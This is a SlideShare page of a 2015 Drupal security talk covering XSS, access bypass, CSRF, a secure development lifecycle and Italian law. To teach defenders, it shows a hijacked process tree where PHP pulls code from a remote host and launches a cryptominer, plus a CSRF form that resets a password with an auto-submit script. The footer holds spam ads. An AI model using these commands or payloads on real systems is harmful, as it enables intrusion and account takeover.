SlideShare a Scribd company logo
1 of 46
Download to read offline
© Ibuildings 2014/2015 - All rights reserved
#DrupalDaysEU
Secure Drupal
From start to finish
© Ibuildings 2014/2015 - All rights reserved
Speaker Info
Boy Baukema
Security Specialist
boy@ibuildings.nl
@relaxnow
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
• Security Specialist
• R&D Security
• Internal & External
• Security Training
• Consulting
• Security Audits
A Security what?
© Ibuildings 2014/2015 - All rights reserved
This is the Talk Title and it could be very long,
for example on two lines or more
© Ibuildings 2014/2015 - All rights reserved
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
Gold Sponsors
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
/usr/sbin/apache2	
  -­‐k	
  start	
  
	
  _	
  /usr/sbin/apache2	
  -­‐k	
  start	
  
	
  	
  _	
  /usr/local/php539/bin/php-­‐cgi	
  	
  
	
  	
  	
  	
  	
  -­‐dauto_prepend_file=http://XXX.XXX.XXX.XXX/
one.txt	
  	
  
	
  	
  	
  	
  	
  -­‐dallow_url_include=on	
  
	
  	
  	
  	
  	
  	
  _	
  sh	
  -­‐c	
  /tmp/sh.sh	
  
	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  _	
  ./minerd	
  	
  
	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  -­‐a	
  scrypt	
  	
  
	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  -­‐o	
  stratum+tcp://multi.ghash.io:3333	
  	
  
	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  -­‐u	
  lscllc.worker16	
  	
  
	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  -­‐p	
  x
Such hacked. Much coins.
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
[20:51:04]	
  root@bal-­‐XXXX.prod:/var/log/nginx#	
  
zgrep	
  "POST	
  /	
  HTTP/1.1"	
  access.log	
  |	
  egrep	
  -­‐o	
  
'forwarded_for="[^s,"]+?'	
  |	
  cut	
  -­‐d'"'	
  -­‐f2	
  |	
  
sort	
  |	
  uniq	
  -­‐c	
  |	
  sort	
  -­‐nr	
  |	
  head	
  -­‐30	
  
	
  	
  	
  2112	
  104.130.25.XXX	
  
	
  	
  	
  1144	
  37.221.162.XXX	
  
	
  	
  	
  1067	
  185.13.37.XXX	
  
	
  	
  	
  1066	
  77.247.181.XXX	
  
	
  	
  	
  1058	
  77.109.141.XXX	
  
	
  	
  	
  1047	
  5.135.158.XXX	
  
	
  	
  	
  1042	
  178.175.139.XXX
HTTP Flood
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
Gold Sponsors
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
• Drupal Top 3

• Secure Development Lifecycle

• The Law
The Plan
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
// to expand it out into a comma-delimited set of placeholders.
foreach (array_filter($args, 'is_array') as $key => $data) {
$new_keys = array();
foreach ($data as $i => $value) {
// This assumes that there are no other placeholders that use the same
// name. For example, if the array placeholder is defined as :example
// and there is already an :example_2 placeholder, this will generate
/includes/database/database.inc
© Ibuildings 2014/2015 - All rights reserved
This is the Talk Title and it could be very long,
for example on two lines or more
Source: http://drupalsecurityreport.org/sites/g/files/g598426/f/
201403/drupal-security-whitepaper-1-3.pdf
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
/**
* Preprocess function to replace the regular label with the
* display label
*/
function field_display_label_preprocess_field(&$variables) {
$field = field_info_instance(...);
if (
isset($field['display_label']) &&
strlen(trim($field['display_label'])) > 0
) {
$variables['label'] = $field['display_label'];
1. XSS
From: http://cgit.drupalcode.org/field_display_label/tree/field_display_label.module?
id=e7f54e1ee44cd6f0fdbc16ac81f2cfb13f3d3d67
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
1. drupal_set_message
2. l
3. watchdog
Which function(s) should receive check_plain() content
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
1. drupal_set_message
2. l
3. watchdog
Which function(s) should receive check_plain() content
Use t('@') syntax!
$text = t(
"@name's blog",
[ '@name' => format_username($account) ]
);
© Ibuildings 2014/2015 - All rights reserved
Filter Input
As early as possible
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
$_GET, $_POST, $_REQUEST, $_COOKIE,
$_SERVER, $_FILES, $argv
everything from the database

$form_state (mostly ['input'])
arg
drupal_get_query_parameters
drupal_current_script_url
drupal_detect_baseurl
request_path
What is input?
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
Sanitize:
$id = (int) arg(1);
$accountEnabled = (bool) arg(1);
Validate:

Form validators
in_array()
mb_strlen() > 1024
url_is_external
valid_url
Filter / Sanitize / Validate
© Ibuildings 2014/2015 - All rights reserved
Encode Output
As late as possible
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
Gold Sponsors
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
// This is to be accessible to all users,
// so 'access callback' can be set
// to TRUE, meaning that we should
// bypass all access checks.
'access callback' => TRUE,
2. Access Bypass
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
global $user;
if ($user->uid = 1) {
watchdog('mymodule', request_uri());
}
A disturbance in the force
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
• IDE / code sniffer (coder tools)
• if (1 = $uid)
• === instead of ==
• user_uid_optional_load($uid = NULL)
Avoiding accidental assign
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
<form

action="http://mysite.com/contact"

method="post"

/>
3. Cross Site Request Forgery
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
<form

action="https://www.drupal.org/user/2457520/edit"

method="post">

<input type="hidden"

name="pass[pass1]" 

value="hacked1" 

/>
3. Cross Site Request Forgery
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
<script>

$('#contactform').submit();

</script>
3. Cross Site Request Forgery
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
Gold Sponsors
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
=> drupal_get_token
<= drupal_valid_token
Drupal Forms to the rescue!
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
• Authentication / Session
• Arbitrary Code Execution
• Denial of Service
• Information Disclosure
• Logic error
• Open Redirect
• Password Protection Bypass
• Session Fixation
• SQL Injection
• ....
4. Others
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
Gold Sponsors
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
Gold Sponsors
© Ibuildings 2014/2015 - All rights reserved
This is the Talk Title and it could be very long,
for example on two lines or more
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
1. Education & Guidance
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
• Threat Assessment

• Security Requirements

2. Design time security
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
• Architecture Review

• Code Review
3. Security Review
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
4. Security Testing
The OWASP Application Security
Verification Standard (ASVS) Project
provides a basis for testing web
application technical security
controls.
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
• Identify third party dependencies
• ... follow their Security Mailinglists
• Make rebuilding painless.
• Make redeploying painless.
• Backup & restore from backup 'regularly'
5. Vulnerability Management
© Ibuildings 2014/2015 - All rights reserved
This is the Talk Title and it could be very long,
for example on two lines or more
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
Gold Sponsors
© Ibuildings 2014/2015 - All rights reserved
The Law
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
the penalty for failure to adopt the minimum measures is
that of Article 169 of the Code 

(imprisonment up to two years);
damages -the manager has the burden of proof that he
took all that was possible to avoid the damage, referring to
appropriate practice known techniques of computer
security , while the victim must only prove the existence of
damage.
Misure minime di sicurezza
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
• Individually associated accounts
• > 8 character passwords
• Changed every 3 to 6 months
• Do not leave admin unattended
• Privileges on need to know basis
• Verify privileges at least yearly
• Update at least every 6 months
• Backup data at least weekly
Disciplinare tecnico
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
Gold Sponsors
Bob's Story
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
Responsible
Disclosure
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
• Know your law
• Think like an attacker
• ... but don't become one (without permission)
• Make sure white hats have a place to go
• Filter Input, Encode Output
• Train your developers
• Design with security in mind
• Review and be critical
• Trust but verify that you are secure
• Perform active automated maintenance
In summary
#DrupalDaysEU
© Ibuildings 2014/2015 - All rights reserved
• http://www.slideshare.net/relaxnow/drupaldays-2015
• http://crackingdrupal.com
• http://drupalsecurityreport.com
• http://drupal.org/writing-secure-code
• http://owasp.org
• OWASP ASVS
The End

More Related Content

Viewers also liked

PhpStorm for Drupal Development (European Drupal Days 2015)
PhpStorm for Drupal Development (European Drupal Days 2015)PhpStorm for Drupal Development (European Drupal Days 2015)
PhpStorm for Drupal Development (European Drupal Days 2015)Eugenio Minardi
 
Deploying an Open Source DAM in SAAS Mode (European Drupal Days 2015)
Deploying an Open Source DAM in SAAS Mode (European Drupal Days 2015)Deploying an Open Source DAM in SAAS Mode (European Drupal Days 2015)
Deploying an Open Source DAM in SAAS Mode (European Drupal Days 2015)Eugenio Minardi
 
Optimizing MariaDB for Web Applications (European Drupal Days 2015)
Optimizing MariaDB for Web Applications (European Drupal Days 2015)Optimizing MariaDB for Web Applications (European Drupal Days 2015)
Optimizing MariaDB for Web Applications (European Drupal Days 2015)Eugenio Minardi
 
Bridging the gap between business and technology - Behaviour Driven Developme...
Bridging the gap between business and technology - Behaviour Driven Developme...Bridging the gap between business and technology - Behaviour Driven Developme...
Bridging the gap between business and technology - Behaviour Driven Developme...Eugenio Minardi
 
Web automation with #d8rules (European Drupal Days 2015)
Web automation with #d8rules (European Drupal Days 2015)Web automation with #d8rules (European Drupal Days 2015)
Web automation with #d8rules (European Drupal Days 2015)Eugenio Minardi
 
Drupal for Big Data - is it ready? (European Drupal Days 2015)
Drupal for Big Data - is it ready? (European Drupal Days 2015)Drupal for Big Data - is it ready? (European Drupal Days 2015)
Drupal for Big Data - is it ready? (European Drupal Days 2015)Eugenio Minardi
 
Verifying Drupal modules with OWASP ASVS 2014 (European Drupal Days 2015)
Verifying Drupal modules with OWASP ASVS 2014 (European Drupal Days 2015)Verifying Drupal modules with OWASP ASVS 2014 (European Drupal Days 2015)
Verifying Drupal modules with OWASP ASVS 2014 (European Drupal Days 2015)Eugenio Minardi
 
Drupal Continuous Integration (European Drupal Days 2015)
Drupal Continuous Integration (European Drupal Days 2015)Drupal Continuous Integration (European Drupal Days 2015)
Drupal Continuous Integration (European Drupal Days 2015)Eugenio Minardi
 
UN World Food Programme Standards & Best Practises (European Drupal Days 2015)
UN World Food Programme Standards & Best Practises (European Drupal Days 2015)UN World Food Programme Standards & Best Practises (European Drupal Days 2015)
UN World Food Programme Standards & Best Practises (European Drupal Days 2015)Eugenio Minardi
 
A Practical Introduction to Symfony (European Drupal Days 2015)
A Practical Introduction to Symfony (European Drupal Days 2015)A Practical Introduction to Symfony (European Drupal Days 2015)
A Practical Introduction to Symfony (European Drupal Days 2015)Eugenio Minardi
 

Viewers also liked (10)

PhpStorm for Drupal Development (European Drupal Days 2015)
PhpStorm for Drupal Development (European Drupal Days 2015)PhpStorm for Drupal Development (European Drupal Days 2015)
PhpStorm for Drupal Development (European Drupal Days 2015)
 
Deploying an Open Source DAM in SAAS Mode (European Drupal Days 2015)
Deploying an Open Source DAM in SAAS Mode (European Drupal Days 2015)Deploying an Open Source DAM in SAAS Mode (European Drupal Days 2015)
Deploying an Open Source DAM in SAAS Mode (European Drupal Days 2015)
 
Optimizing MariaDB for Web Applications (European Drupal Days 2015)
Optimizing MariaDB for Web Applications (European Drupal Days 2015)Optimizing MariaDB for Web Applications (European Drupal Days 2015)
Optimizing MariaDB for Web Applications (European Drupal Days 2015)
 
Bridging the gap between business and technology - Behaviour Driven Developme...
Bridging the gap between business and technology - Behaviour Driven Developme...Bridging the gap between business and technology - Behaviour Driven Developme...
Bridging the gap between business and technology - Behaviour Driven Developme...
 
Web automation with #d8rules (European Drupal Days 2015)
Web automation with #d8rules (European Drupal Days 2015)Web automation with #d8rules (European Drupal Days 2015)
Web automation with #d8rules (European Drupal Days 2015)
 
Drupal for Big Data - is it ready? (European Drupal Days 2015)
Drupal for Big Data - is it ready? (European Drupal Days 2015)Drupal for Big Data - is it ready? (European Drupal Days 2015)
Drupal for Big Data - is it ready? (European Drupal Days 2015)
 
Verifying Drupal modules with OWASP ASVS 2014 (European Drupal Days 2015)
Verifying Drupal modules with OWASP ASVS 2014 (European Drupal Days 2015)Verifying Drupal modules with OWASP ASVS 2014 (European Drupal Days 2015)
Verifying Drupal modules with OWASP ASVS 2014 (European Drupal Days 2015)
 
Drupal Continuous Integration (European Drupal Days 2015)
Drupal Continuous Integration (European Drupal Days 2015)Drupal Continuous Integration (European Drupal Days 2015)
Drupal Continuous Integration (European Drupal Days 2015)
 
UN World Food Programme Standards & Best Practises (European Drupal Days 2015)
UN World Food Programme Standards & Best Practises (European Drupal Days 2015)UN World Food Programme Standards & Best Practises (European Drupal Days 2015)
UN World Food Programme Standards & Best Practises (European Drupal Days 2015)
 
A Practical Introduction to Symfony (European Drupal Days 2015)
A Practical Introduction to Symfony (European Drupal Days 2015)A Practical Introduction to Symfony (European Drupal Days 2015)
A Practical Introduction to Symfony (European Drupal Days 2015)
 

Similar to Secure Drupal, from start to finish (European Drupal Days 2015)

Doing Drupal security right
Doing Drupal security rightDoing Drupal security right
Doing Drupal security rightGábor Hojtsy
 
Best Practices with CA Workload Automation AutoSys (AE)
Best Practices with CA Workload Automation AutoSys (AE)Best Practices with CA Workload Automation AutoSys (AE)
Best Practices with CA Workload Automation AutoSys (AE)CA Technologies
 
Drupal security
Drupal securityDrupal security
Drupal securityJozef Toth
 
Another Copernican Revolution: maintenance first, projects second (European D...
Another Copernican Revolution: maintenance first, projects second (European D...Another Copernican Revolution: maintenance first, projects second (European D...
Another Copernican Revolution: maintenance first, projects second (European D...Eugenio Minardi
 
Drupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp BratislavaDrupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp BratislavaGábor Hojtsy
 
Hong kong drupal user group nov 8th - drupal 7.32 security vulnerability
Hong kong drupal user group   nov 8th - drupal 7.32 security vulnerabilityHong kong drupal user group   nov 8th - drupal 7.32 security vulnerability
Hong kong drupal user group nov 8th - drupal 7.32 security vulnerabilityAnn Lam
 
Hong Kong Drupal User Group - Nov 8th
Hong Kong Drupal User Group - Nov 8thHong Kong Drupal User Group - Nov 8th
Hong Kong Drupal User Group - Nov 8thWong Hoi Sing Edison
 
Hong kong drupal user group nov 8th - drupal 7.32 security vulnerability
Hong kong drupal user group   nov 8th - drupal 7.32 security vulnerabilityHong kong drupal user group   nov 8th - drupal 7.32 security vulnerability
Hong kong drupal user group nov 8th - drupal 7.32 security vulnerabilityAnn Lam
 
Prospectus: Cloud, Mobility and Interopability - AMIK Bandung Sept 2013
Prospectus: Cloud, Mobility and Interopability - AMIK Bandung Sept 2013Prospectus: Cloud, Mobility and Interopability - AMIK Bandung Sept 2013
Prospectus: Cloud, Mobility and Interopability - AMIK Bandung Sept 2013The World Bank
 
Database as a Service, Collaborate 2016
Database as a Service, Collaborate 2016Database as a Service, Collaborate 2016
Database as a Service, Collaborate 2016Kellyn Pot'Vin-Gorman
 
Java Web Application Security - Denver JUG 2013
Java Web Application Security - Denver JUG 2013Java Web Application Security - Denver JUG 2013
Java Web Application Security - Denver JUG 2013Matt Raible
 
PHP SuperGlobals: Supersized Trouble
PHP SuperGlobals: Supersized TroublePHP SuperGlobals: Supersized Trouble
PHP SuperGlobals: Supersized TroubleImperva
 
Pentest 101 @ Mahanakorn Network Research Laboratory
Pentest 101 @ Mahanakorn Network Research LaboratoryPentest 101 @ Mahanakorn Network Research Laboratory
Pentest 101 @ Mahanakorn Network Research LaboratoryPichaya Morimoto
 
Doing Drupal security right from Drupalcon London
Doing Drupal security right from Drupalcon LondonDoing Drupal security right from Drupalcon London
Doing Drupal security right from Drupalcon LondonGábor Hojtsy
 
2014-11-11 Multiple Approaches to Managing Puppet Modules @ Puppet Camp Seattle
2014-11-11 Multiple Approaches to Managing Puppet Modules @ Puppet Camp Seattle2014-11-11 Multiple Approaches to Managing Puppet Modules @ Puppet Camp Seattle
2014-11-11 Multiple Approaches to Managing Puppet Modules @ Puppet Camp Seattlegarrett honeycutt
 
Automating secure server baselines with Chef
Automating secure server baselines with ChefAutomating secure server baselines with Chef
Automating secure server baselines with ChefChef Software, Inc.
 

Similar to Secure Drupal, from start to finish (European Drupal Days 2015) (20)

Doing Drupal security right
Doing Drupal security rightDoing Drupal security right
Doing Drupal security right
 
Best Practices with CA Workload Automation AutoSys (AE)
Best Practices with CA Workload Automation AutoSys (AE)Best Practices with CA Workload Automation AutoSys (AE)
Best Practices with CA Workload Automation AutoSys (AE)
 
Drupal security
Drupal securityDrupal security
Drupal security
 
Another Copernican Revolution: maintenance first, projects second (European D...
Another Copernican Revolution: maintenance first, projects second (European D...Another Copernican Revolution: maintenance first, projects second (European D...
Another Copernican Revolution: maintenance first, projects second (European D...
 
Drupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp BratislavaDrupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp Bratislava
 
Hong kong drupal user group nov 8th - drupal 7.32 security vulnerability
Hong kong drupal user group   nov 8th - drupal 7.32 security vulnerabilityHong kong drupal user group   nov 8th - drupal 7.32 security vulnerability
Hong kong drupal user group nov 8th - drupal 7.32 security vulnerability
 
Hong Kong Drupal User Group - Nov 8th
Hong Kong Drupal User Group - Nov 8thHong Kong Drupal User Group - Nov 8th
Hong Kong Drupal User Group - Nov 8th
 
Hong kong drupal user group nov 8th - drupal 7.32 security vulnerability
Hong kong drupal user group   nov 8th - drupal 7.32 security vulnerabilityHong kong drupal user group   nov 8th - drupal 7.32 security vulnerability
Hong kong drupal user group nov 8th - drupal 7.32 security vulnerability
 
Prospectus: Cloud, Mobility and Interopability - AMIK Bandung Sept 2013
Prospectus: Cloud, Mobility and Interopability - AMIK Bandung Sept 2013Prospectus: Cloud, Mobility and Interopability - AMIK Bandung Sept 2013
Prospectus: Cloud, Mobility and Interopability - AMIK Bandung Sept 2013
 
Database as a Service, Collaborate 2016
Database as a Service, Collaborate 2016Database as a Service, Collaborate 2016
Database as a Service, Collaborate 2016
 
Java Web Application Security - Denver JUG 2013
Java Web Application Security - Denver JUG 2013Java Web Application Security - Denver JUG 2013
Java Web Application Security - Denver JUG 2013
 
Mechsoft products services
Mechsoft  products  servicesMechsoft  products  services
Mechsoft products services
 
PHP SuperGlobals: Supersized Trouble
PHP SuperGlobals: Supersized TroublePHP SuperGlobals: Supersized Trouble
PHP SuperGlobals: Supersized Trouble
 
Pentest 101 @ Mahanakorn Network Research Laboratory
Pentest 101 @ Mahanakorn Network Research LaboratoryPentest 101 @ Mahanakorn Network Research Laboratory
Pentest 101 @ Mahanakorn Network Research Laboratory
 
Doing Drupal security right from Drupalcon London
Doing Drupal security right from Drupalcon LondonDoing Drupal security right from Drupalcon London
Doing Drupal security right from Drupalcon London
 
Stackato Presentation Techzone 2013
Stackato Presentation Techzone 2013Stackato Presentation Techzone 2013
Stackato Presentation Techzone 2013
 
Web Security... Level Up
Web Security... Level UpWeb Security... Level Up
Web Security... Level Up
 
2014-11-11 Multiple Approaches to Managing Puppet Modules @ Puppet Camp Seattle
2014-11-11 Multiple Approaches to Managing Puppet Modules @ Puppet Camp Seattle2014-11-11 Multiple Approaches to Managing Puppet Modules @ Puppet Camp Seattle
2014-11-11 Multiple Approaches to Managing Puppet Modules @ Puppet Camp Seattle
 
Automating secure server baselines with Chef
Automating secure server baselines with ChefAutomating secure server baselines with Chef
Automating secure server baselines with Chef
 
PHP Security
PHP SecurityPHP Security
PHP Security
 

More from Eugenio Minardi

Delphi and ExtJS (26 ottobre 2017)
Delphi and ExtJS (26 ottobre 2017)Delphi and ExtJS (26 ottobre 2017)
Delphi and ExtJS (26 ottobre 2017)Eugenio Minardi
 
ExtJS: La piattaforma vincente (tools)
ExtJS: La piattaforma vincente (tools)ExtJS: La piattaforma vincente (tools)
ExtJS: La piattaforma vincente (tools)Eugenio Minardi
 
ExtJS: La piattaforma vincente (multiple screens)
ExtJS: La piattaforma vincente (multiple screens)ExtJS: La piattaforma vincente (multiple screens)
ExtJS: La piattaforma vincente (multiple screens)Eugenio Minardi
 
ExtJS: La piattaforma vincente (rich UI)
ExtJS: La piattaforma vincente (rich UI)ExtJS: La piattaforma vincente (rich UI)
ExtJS: La piattaforma vincente (rich UI)Eugenio Minardi
 
ExtJS: La piattaforma vincente (class system)
ExtJS: La piattaforma vincente (class system)ExtJS: La piattaforma vincente (class system)
ExtJS: La piattaforma vincente (class system)Eugenio Minardi
 
ExtJS: La piattaforma vincente
ExtJS: La piattaforma vincenteExtJS: La piattaforma vincente
ExtJS: La piattaforma vincenteEugenio Minardi
 
Distributed Team Management: 
Pitfall, Challenges and Advantages
Distributed Team Management: 
Pitfall, Challenges and AdvantagesDistributed Team Management: 
Pitfall, Challenges and Advantages
Distributed Team Management: 
Pitfall, Challenges and AdvantagesEugenio Minardi
 
MongoDB: What, why, when
MongoDB: What, why, whenMongoDB: What, why, when
MongoDB: What, why, whenEugenio Minardi
 
Il Web orientato al futuro: Express, Angular e nodeJS
Il Web orientato al futuro: Express, Angular e nodeJS Il Web orientato al futuro: Express, Angular e nodeJS
Il Web orientato al futuro: Express, Angular e nodeJS Eugenio Minardi
 
MEAN: il nuovo stack di sviluppo per il futuro del web
MEAN: il nuovo stack di sviluppo per il futuro del webMEAN: il nuovo stack di sviluppo per il futuro del web
MEAN: il nuovo stack di sviluppo per il futuro del webEugenio Minardi
 
Gestione della configurazione in Drupal 8
Gestione della configurazione in Drupal 8Gestione della configurazione in Drupal 8
Gestione della configurazione in Drupal 8Eugenio Minardi
 
Labortatorio di Information Design e UX con Drupal
Labortatorio di Information Design e UX con DrupalLabortatorio di Information Design e UX con Drupal
Labortatorio di Information Design e UX con DrupalEugenio Minardi
 
Drupal dashboard for dummies with d3
Drupal dashboard for dummies with d3Drupal dashboard for dummies with d3
Drupal dashboard for dummies with d3Eugenio Minardi
 

More from Eugenio Minardi (13)

Delphi and ExtJS (26 ottobre 2017)
Delphi and ExtJS (26 ottobre 2017)Delphi and ExtJS (26 ottobre 2017)
Delphi and ExtJS (26 ottobre 2017)
 
ExtJS: La piattaforma vincente (tools)
ExtJS: La piattaforma vincente (tools)ExtJS: La piattaforma vincente (tools)
ExtJS: La piattaforma vincente (tools)
 
ExtJS: La piattaforma vincente (multiple screens)
ExtJS: La piattaforma vincente (multiple screens)ExtJS: La piattaforma vincente (multiple screens)
ExtJS: La piattaforma vincente (multiple screens)
 
ExtJS: La piattaforma vincente (rich UI)
ExtJS: La piattaforma vincente (rich UI)ExtJS: La piattaforma vincente (rich UI)
ExtJS: La piattaforma vincente (rich UI)
 
ExtJS: La piattaforma vincente (class system)
ExtJS: La piattaforma vincente (class system)ExtJS: La piattaforma vincente (class system)
ExtJS: La piattaforma vincente (class system)
 
ExtJS: La piattaforma vincente
ExtJS: La piattaforma vincenteExtJS: La piattaforma vincente
ExtJS: La piattaforma vincente
 
Distributed Team Management: 
Pitfall, Challenges and Advantages
Distributed Team Management: 
Pitfall, Challenges and AdvantagesDistributed Team Management: 
Pitfall, Challenges and Advantages
Distributed Team Management: 
Pitfall, Challenges and Advantages
 
MongoDB: What, why, when
MongoDB: What, why, whenMongoDB: What, why, when
MongoDB: What, why, when
 
Il Web orientato al futuro: Express, Angular e nodeJS
Il Web orientato al futuro: Express, Angular e nodeJS Il Web orientato al futuro: Express, Angular e nodeJS
Il Web orientato al futuro: Express, Angular e nodeJS
 
MEAN: il nuovo stack di sviluppo per il futuro del web
MEAN: il nuovo stack di sviluppo per il futuro del webMEAN: il nuovo stack di sviluppo per il futuro del web
MEAN: il nuovo stack di sviluppo per il futuro del web
 
Gestione della configurazione in Drupal 8
Gestione della configurazione in Drupal 8Gestione della configurazione in Drupal 8
Gestione della configurazione in Drupal 8
 
Labortatorio di Information Design e UX con Drupal
Labortatorio di Information Design e UX con DrupalLabortatorio di Information Design e UX con Drupal
Labortatorio di Information Design e UX con Drupal
 
Drupal dashboard for dummies with d3
Drupal dashboard for dummies with d3Drupal dashboard for dummies with d3
Drupal dashboard for dummies with d3
 

Recently uploaded

AI Generated 3D Models | AI 3D Model Generator
AI Generated 3D Models | AI 3D Model GeneratorAI Generated 3D Models | AI 3D Model Generator
AI Generated 3D Models | AI 3D Model Generator3DailyAI1
 
一比一定制(Temasek毕业证书)新加坡淡马锡理工学院毕业证学位证书
一比一定制(Temasek毕业证书)新加坡淡马锡理工学院毕业证学位证书一比一定制(Temasek毕业证书)新加坡淡马锡理工学院毕业证学位证书
一比一定制(Temasek毕业证书)新加坡淡马锡理工学院毕业证学位证书B
 
Premier Mobile App Development Agency in USA.pdf
Premier Mobile App Development Agency in USA.pdfPremier Mobile App Development Agency in USA.pdf
Premier Mobile App Development Agency in USA.pdfappinfoedgeca
 
100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...
100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...
100^%)( POLOKWANE))(*((+27838792658))*))௹ )Abortion Pills for Sale in Sibasa,...musaddumba454
 
Free on Wednesdays T Shirts Free on Wednesdays Sweatshirts
Free on Wednesdays T Shirts Free on Wednesdays SweatshirtsFree on Wednesdays T Shirts Free on Wednesdays Sweatshirts
Free on Wednesdays T Shirts Free on Wednesdays Sweatshirtsrahman018755
 
Free scottie t shirts Free scottie t shirts
Free scottie t shirts Free scottie t shirtsFree scottie t shirts Free scottie t shirts
Free scottie t shirts Free scottie t shirtsrahman018755
 
一比一原版(毕业证书)新加坡南洋理工学院毕业证原件一模一样
一比一原版(毕业证书)新加坡南洋理工学院毕业证原件一模一样一比一原版(毕业证书)新加坡南洋理工学院毕业证原件一模一样
一比一原版(毕业证书)新加坡南洋理工学院毕业证原件一模一样AS
 
TORTOGEL TELAH MENJADI SALAH SATU PLATFORM PERMAINAN PALING FAVORIT.
TORTOGEL TELAH MENJADI SALAH SATU PLATFORM PERMAINAN PALING FAVORIT.TORTOGEL TELAH MENJADI SALAH SATU PLATFORM PERMAINAN PALING FAVORIT.
TORTOGEL TELAH MENJADI SALAH SATU PLATFORM PERMAINAN PALING FAVORIT.Tortogel
 
一比一原版(PSU毕业证书)美国宾州州立大学毕业证如何办理
一比一原版(PSU毕业证书)美国宾州州立大学毕业证如何办理一比一原版(PSU毕业证书)美国宾州州立大学毕业证如何办理
一比一原版(PSU毕业证书)美国宾州州立大学毕业证如何办理Fir
 
APNIC Updates presented by Paul Wilson at CaribNOG 27
APNIC Updates presented by Paul Wilson at  CaribNOG 27APNIC Updates presented by Paul Wilson at  CaribNOG 27
APNIC Updates presented by Paul Wilson at CaribNOG 27APNIC
 
一比一原版(Bath毕业证书)英国桑德兰大学毕业证如何办理
一比一原版(Bath毕业证书)英国桑德兰大学毕业证如何办理一比一原版(Bath毕业证书)英国桑德兰大学毕业证如何办理
一比一原版(Bath毕业证书)英国桑德兰大学毕业证如何办理B
 
一比一定制(USC毕业证书)美国南加州大学毕业证学位证书
一比一定制(USC毕业证书)美国南加州大学毕业证学位证书一比一定制(USC毕业证书)美国南加州大学毕业证学位证书
一比一定制(USC毕业证书)美国南加州大学毕业证学位证书Fir
 
一比一原版布兰迪斯大学毕业证如何办理
一比一原版布兰迪斯大学毕业证如何办理一比一原版布兰迪斯大学毕业证如何办理
一比一原版布兰迪斯大学毕业证如何办理A
 
Statistical Analysis of DNS Latencies.pdf
Statistical Analysis of DNS Latencies.pdfStatistical Analysis of DNS Latencies.pdf
Statistical Analysis of DNS Latencies.pdfOndejSur
 
Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I...
Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I...Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I...
Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I...APNIC
 
一比一定制波士顿学院毕业证学位证书
一比一定制波士顿学院毕业证学位证书一比一定制波士顿学院毕业证学位证书
一比一定制波士顿学院毕业证学位证书A
 
一比一原版英国格林多大学毕业证如何办理
一比一原版英国格林多大学毕业证如何办理一比一原版英国格林多大学毕业证如何办理
一比一原版英国格林多大学毕业证如何办理AS
 
一比一原版(UWE毕业证书)西英格兰大学毕业证原件一模一样
一比一原版(UWE毕业证书)西英格兰大学毕业证原件一模一样一比一原版(UWE毕业证书)西英格兰大学毕业证原件一模一样
一比一原版(UWE毕业证书)西英格兰大学毕业证原件一模一样Fi
 
原版定制英国赫瑞瓦特大学毕业证原件一模一样
原版定制英国赫瑞瓦特大学毕业证原件一模一样原版定制英国赫瑞瓦特大学毕业证原件一模一样
原版定制英国赫瑞瓦特大学毕业证原件一模一样AS
 
I’ll See Y’All Motherfuckers In Game 7 Shirt
I’ll See Y’All Motherfuckers In Game 7 ShirtI’ll See Y’All Motherfuckers In Game 7 Shirt
I’ll See Y’All Motherfuckers In Game 7 Shirtrahman018755
 

Recently uploaded (20)

AI Generated 3D Models | AI 3D Model Generator
